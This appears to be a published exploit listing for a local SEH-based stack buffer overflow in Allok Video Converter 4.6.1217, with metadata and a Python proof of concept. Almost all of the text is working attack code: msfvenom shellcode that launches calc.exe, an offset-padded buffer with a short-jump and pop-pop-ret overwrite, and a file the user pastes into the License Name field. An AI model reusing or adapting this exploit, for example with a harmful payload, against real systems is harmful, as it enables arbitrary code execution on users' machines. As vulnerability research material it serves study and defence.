Allok Video Converter 4.6.1217 Stack Overflow

Risk: High
Local: Yes
Remote: No
CWE: CWE-119

# Exploit Title: Allok Video Converter 4.6.1217 - Stack Overflow (SEH) # Date: 2020-01-12 # Exploit Author: Antonio de la Piedra # Vendor Homepage: # Software Link: # Version: 4.6.1217 # Tested on: Windows 7 SP1 32-bit # Copy paste the contents of poc.txt into the License Name input field # of Allok Video Converter 4.6.1217 to execute calc.exe. nseh_offset = 780 total = 1000 # msfvenom -p windows/exec -b '\x00\x0a\x0d' -f python --var-name shellcode= _calc CMD=calc.exe EXITFUNC=thread shellcode_calc = b"" shellcode_calc += b"\xdd\xc0\xbe\x48\x33\xfd\x23\xd9\x74\x24" shellcode_calc += b"\xf4\x5f\x33\xc9\xb1\x31\x83\xef\xfc\x31" shellcode_calc += b"\x77\x14\x03\x77\x5c\xd1\x08\xdf\xb4\x97" shellcode_calc += b"\xf3\x20\x44\xf8\x7a\xc5\x75\x38\x18\x8d" shellcode_calc += b"\x25\x88\x6a\xc3\xc9\x63\x3e\xf0\x5a\x01" shellcode_calc += b"\x97\xf7\xeb\xac\xc1\x36\xec\x9d\x32\x58" shellcode_calc += b"\x6e\xdc\x66\xba\x4f\x2f\x7b\xbb\x88\x52" shellcode_calc += b"\x76\xe9\x41\x18\x25\x1e\xe6\x54\xf6\x95" shellcode_calc += b"\xb4\x79\x7e\x49\x0c\x7b\xaf\xdc\x07\x22" shellcode_calc += b"\x6f\xde\xc4\x5e\x26\xf8\x09\x5a\xf0\x73" shellcode_calc += b"\xf9\x10\x03\x52\x30\xd8\xa8\x9b\xfd\x2b" shellcode_calc += b"\xb0\xdc\x39\xd4\xc7\x14\x3a\x69\xd0\xe2" shellcode_calc += b"\x41\xb5\x55\xf1\xe1\x3e\xcd\xdd\x10\x92" shellcode_calc += b"\x88\x96\x1e\x5f\xde\xf1\x02\x5e\x33\x8a" shellcode_calc += b"\x3e\xeb\xb2\x5d\xb7\xaf\x90\x79\x9c\x74" shellcode_calc += b"\xb8\xd8\x78\xda\xc5\x3b\x23\x83\x63\x37" shellcode_calc += b"\xc9\xd0\x19\x1a\x87\x27\xaf\x20\xe5\x28" shellcode_calc += b"\xaf\x2a\x59\x41\x9e\xa1\x36\x16\x1f\x60" shellcode_calc += b"\x73\xf8\xfd\xa1\x89\x91\x5b\x20\x30\xfc" shellcode_calc += b"\x5b\x9e\x76\xf9\xdf\x2b\x06\xfe\xc0\x59" shellcode_calc += b"\x03\xba\x46\xb1\x79\xd3\x22\xb5\x2e\xd4" shellcode_calc += b"\x66\xd6\xb1\x46\xea\x37\x54\xef\x89\x47" poc = "" poc += "A"*nseh_offset poc += "\xEB\x0b\x90\x90" # jmp forward (nseh) poc += "\x59\x78\x03\x10" # pop pop ret (seh) poc += "\x90"*20 poc += shellcode_calc poc += "D"*(total - len(poc)) file = open("poc_seh.txt","w") file.write(poc) file.close()

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